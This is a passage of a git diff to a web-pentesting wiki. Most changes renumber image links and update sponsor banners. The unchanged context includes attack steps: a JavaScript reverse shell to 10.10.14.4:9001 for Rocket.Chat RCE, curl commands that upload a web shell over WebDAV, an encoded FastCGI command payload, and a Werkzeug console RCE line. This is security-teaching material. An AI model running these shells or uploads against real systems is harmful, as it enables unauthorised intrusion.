 As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
 
diff --git a/network-services-pentesting/pentesting-web/h2-java-sql-database.md b/network-services-pentesting/pentesting-web/h2-java-sql-database.md
index 59cf13575..e3a30439e 100644
--- a/network-services-pentesting/pentesting-web/h2-java-sql-database.md
+++ b/network-services-pentesting/pentesting-web/h2-java-sql-database.md
@@ -20,11 +20,11 @@ Official page: [https://www.h2database.com/html/main.html](https://www.h2databas
 
 You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):
 
-![](<../../.gitbook/assets/image (128).png>)
+![](<../../.gitbook/assets/image (131).png>)
 
 Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it:
 
-![](<../../.gitbook/assets/image (198).png>)
+![](<../../.gitbook/assets/image (201).png>)
 
 _**Trick from box Hawk of HTB.**_
 
diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md
index d7f997439..9031dd502 100644
--- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 Test executable file extensions:
 
@@ -238,7 +238,7 @@ The main limitation of this technique if the server is vulnerable is that **it c
 
 You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
 
-![](<../../.gitbook/assets/image (841).png>)
+![](<../../.gitbook/assets/image (844).png>)
 
 Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
 
@@ -300,7 +300,7 @@ HTTP/1.1 200 OK
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md
index b402d101d..60b79b2b5 100644
--- a/network-services-pentesting/pentesting-web/jira.md
+++ b/network-services-pentesting/pentesting-web/jira.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
 * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
 * [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-web/jsp.md b/network-services-pentesting/pentesting-web/jsp.md
index 27c6861d2..664a5018e 100644
--- a/network-services-pentesting/pentesting-web/jsp.md
+++ b/network-services-pentesting/pentesting-web/jsp.md
@@ -24,7 +24,7 @@ Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipu
 
 Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
 
-![](<../../.gitbook/assets/image (323).png>)
+![](<../../.gitbook/assets/image (326).png>)
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-web/laravel.md b/network-services-pentesting/pentesting-web/laravel.md
index a3ba23e34..329dda572 100644
--- a/network-services-pentesting/pentesting-web/laravel.md
+++ b/network-services-pentesting/pentesting-web/laravel.md
@@ -19,7 +19,7 @@
 If Laravel is in **debugging mode** you will be able to access the **code** and **sensitive data**.\
 For example `http://127.0.0.1:8000/profiles`:
 
-![](<../../.gitbook/assets/image (1043).png>)
+![](<../../.gitbook/assets/image (1046).png>)
 
 This is usually needed for exploiting other Laravel RCE CVEs.
 
diff --git a/network-services-pentesting/pentesting-web/moodle.md b/network-services-pentesting/pentesting-web/moodle.md
index 46237dc7a..918bd06a9 100644
--- a/network-services-pentesting/pentesting-web/moodle.md
+++ b/network-services-pentesting/pentesting-web/moodle.md
@@ -92,7 +92,7 @@ I found that the automatic tools are pretty **useless finding vulnerabilities af
 
 You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab\*\*:\*\*
 
-![](<../../.gitbook/assets/image (627).png>)
+![](<../../.gitbook/assets/image (630).png>)
 
 If you are manager you may still need to **activate this option**. You can see how ins the moodle privilege escalation PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).
 
diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md
index 637af7549..cfb893dc1 100644
--- a/network-services-pentesting/pentesting-web/nginx.md
+++ b/network-services-pentesting/pentesting-web/nginx.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -315,7 +315,7 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
 * [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
 * [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index 349e47107..340cc9151 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -46,7 +46,7 @@ If `==` is used in PHP, then there are unexpected cases where the comparison doe
 
 PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
 
-![](<../../../.gitbook/assets/image (564).png>)
+![](<../../../.gitbook/assets/image (567).png>)
 
 {% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
 
@@ -138,7 +138,7 @@ From: [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challen
 
 Trick from: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223) and [https://mizu.re/post/pong](https://mizu.re/post/pong)
 
-<figure><img src="../../../.gitbook/assets/image (23).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (26).png" alt=""><figcaption></figcaption></figure>
 
 In short the problem happens because the `preg_*` functions in PHP builds upon the [PCRE library](http://www.pcre.org/). In PCRE certain regular expressions are matched by using a lot of recursive calls, which uses up a lot of stack space. It is possible to set a limit on the amount of recursions allowed, but in PHP this limit [defaults to 100.000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) which is more than fits in the stack.
 
@@ -213,7 +213,7 @@ True
 If a **PHP page is printing errors and echoing back some input provided by the user**, the user can make the PHP server print back some **content long enough** so when it tries to **add the headers** into the response the server will throw and error.\
 In the following scenario the **attacker made the server throw some big errors**, and as you can see in the screen when php tried to **modify the header information, it couldn't** (so for example the CSP header wasn't sent to the user):
 
-![](<../../../.gitbook/assets/image (1082).png>)
+![](<../../../.gitbook/assets/image (1085).png>)
 
 ## Code execution
 
@@ -463,7 +463,7 @@ $_=$$____;
 $___($_[_]); // ASSERT($_POST[_]);
 ```
 
-<figure><img src="../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
index 8ac8e584b..f08ed09ab 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
@@ -115,7 +115,7 @@ Both configuration can be seen in the output of **`phpinfo()`**:
 
 ![](https://0xrick.github.io/images/hackthebox/kryptos/17.png)
 
-![](<../../../../.gitbook/assets/image (490).png>)
+![](<../../../../.gitbook/assets/image (493).png>)
 
 ## open\_basedir Bypass
 
@@ -152,9 +152,9 @@ foreach($file_list as $f){
 If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\
 If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**:
 
-![](<../../../../.gitbook/assets/image (542).png>)
+![](<../../../../.gitbook/assets/image (545).png>)
 
-![](<../../../../.gitbook/assets/image (574).png>)
+![](<../../../../.gitbook/assets/image (577).png>)
 
 Note that the first thing you need to do is find where is the **unix socket of php-fpm**. It use to be under `/var/run` so you can **use the previous code to list the directory and find it**.\
 Code from [here](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy).
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
index 9bee8c401..1c66c5616 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
@@ -48,7 +48,7 @@ I'm not sure if this is working in modern versions because I tried once and it d
 
 Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
 
-![](<../../../../.gitbook/assets/image (224).png>)
+![](<../../../../.gitbook/assets/image (227).png>)
 
 Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**]\([http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)). And then copy/pasting the abse64 in this php code:
 
@@ -420,9 +420,9 @@ echo $client->request($params, $code)."\n";
 
 Using the previous function you will see that the function **`system`** is **still disabled** but **`phpinfo()`** shows a **`disable_functions`** **empty**:
 
-![](<../../../../.gitbook/assets/image (185).png>)
+![](<../../../../.gitbook/assets/image (188).png>)
 
-![](<../../../../.gitbook/assets/image (710).png>)
+![](<../../../../.gitbook/assets/image (713).png>)
 
 **So, I think that you can only set `disable_functions` via php `.ini` config files and the PHP\_VALUE won't override that setting.**
 
@@ -435,7 +435,7 @@ You can access it here: [https://github.com/w181496/FuckFastcgi](https://github.
 You will find that the exploit is very similar to the previous code, but instead of trying to bypass `disable_functions` using PHP\_VALUE, it tries to **load an external PHP module** to execute code using the parameters `extension_dir` and `extension` inside the variable `PHP_ADMIN_VALUE`.\
 **NOTE1**: You probably will need to **recompile** the extension with the **same PHP version that the server** is using (you can check it inside the output of phpinfo):
 
-![](<../../../../.gitbook/assets/image (177).png>)
+![](<../../../../.gitbook/assets/image (180).png>)
 
 {% hint style="danger" %}
 **NOTE2**: I managed to make this work by inserting the `extension_dir` and `extension` values inside a PHP `.ini` config file (something that you won't be able to do attacking a server). But for some reason, when using this exploit and loading the extension from the `PHP_ADMIN_VALUE` variable the process just died, so I don't know if this technique is still valid.
diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md
index aa39f95fc..b04fbcb8a 100644
--- a/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -1,12 +1,12 @@
 # WebDav
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
 
 <details>
 
@@ -43,7 +43,7 @@ davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every
 
 Output sample:
 
-![](<../../.gitbook/assets/image (848).png>)
+![](<../../.gitbook/assets/image (851).png>)
 
 This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
 
@@ -67,13 +67,13 @@ curl -T 'shell.txt' 'http://$ip'
 curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
 ```
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
 
 ## IIS5/6 WebDav Vulnerability
 
@@ -81,7 +81,7 @@ This vulnerability is very interesting. The **WebDav** does **not allow** to **u
 
 Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did).
 
-![](<../../.gitbook/assets/image (1089).png>)
+![](<../../.gitbook/assets/image (1092).png>)
 
 ## Post credentials
 
@@ -139,10 +139,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md
index 1687249ce..40d929cfa 100644
--- a/network-services-pentesting/pentesting-web/rocket-chat.md
+++ b/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -14,11 +14,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## RCE
 
 If you are admin inside Rocket Chat you can get RCE.
@@ -26,7 +25,7 @@ If you are admin inside Rocket Chat you can get RCE.
 * Got to **`Integrations`** and select **`New Integration`** and choose any: **`Incoming WebHook`** or **`Outgoing WebHook`**.
   * `/admin/integrations/incoming`
 
-<figure><img src="../../.gitbook/assets/image (263).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (266).png" alt=""><figcaption></figcaption></figure>
 
 * According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) like:
 
@@ -38,21 +37,20 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
 
 * Configure the WebHook (the channel and post as username must exists):
 
-<figure><img src="../../.gitbook/assets/image (902).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (905).png" alt=""><figcaption></figcaption></figure>
 
 * Configure WebHook script:
 
-<figure><img src="../../.gitbook/assets/image (569).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (572).png" alt=""><figcaption></figcaption></figure>
 
 * Save changes
 * Get the generated WebHook URL:
 
-<figure><img src="../../.gitbook/assets/image (934).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (937).png" alt=""><figcaption></figcaption></figure>
 
 * Call it with curl and you shuold receive the rev shell
 
-
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/pentesting-web/spring-actuators.md b/network-services-pentesting/pentesting-web/spring-actuators.md
index 2dc78e158..014e8abc3 100644
--- a/network-services-pentesting/pentesting-web/spring-actuators.md
+++ b/network-services-pentesting/pentesting-web/spring-actuators.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ## **Spring Auth Bypass**
 
-<figure><img src="../../.gitbook/assets/image (924).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (927).png" alt=""><figcaption></figcaption></figure>
 
 **From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
 
diff --git a/network-services-pentesting/pentesting-web/tomcat/README.md b/network-services-pentesting/pentesting-web/tomcat/README.md
index c3b4cbce3..fb9e6c5fa 100644
--- a/network-services-pentesting/pentesting-web/tomcat/README.md
+++ b/network-services-pentesting/pentesting-web/tomcat/README.md
@@ -25,7 +25,7 @@
 * It usually runs on **port 8080**
 * **Common Tomcat error:**
 
-<figure><img src="../../../.gitbook/assets/image (147).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (150).png" alt=""><figcaption></figcaption></figure>
 
 ## Enumeration
 
diff --git a/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
index 152f2d797..66896b119 100644
--- a/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
+++ b/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -34,7 +34,7 @@ msf> auxiliary/scanner/vmware/vmware_http_login
 
 If you find valid credentials, you can use more metasploit scanner modules to obtain information.
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/pentesting-web/web-api-pentesting.md b/network-services-pentesting/pentesting-web/web-api-pentesting.md
index 8e7e2491e..383bb9499 100644
--- a/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -14,12 +14,12 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=web-api-pentesting) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %}
 
 ## API Pentesting Methodology Summary
 
@@ -72,12 +72,12 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 
 * [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=web-api-pentesting) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %}
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-web/werkzeug.md b/network-services-pentesting/pentesting-web/werkzeug.md
index f9e003780..a97bc1bc2 100644
--- a/network-services-pentesting/pentesting-web/werkzeug.md
+++ b/network-services-pentesting/pentesting-web/werkzeug.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -28,7 +28,7 @@ If debug is active you could try to access to `/console` and gain RCE.
 __import__('os').popen('whoami').read();
 ```
 
-![](<../../.gitbook/assets/image (114).png>)
+![](<../../.gitbook/assets/image (117).png>)
 
 There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.
 
@@ -183,7 +183,7 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
 * [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
 * [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
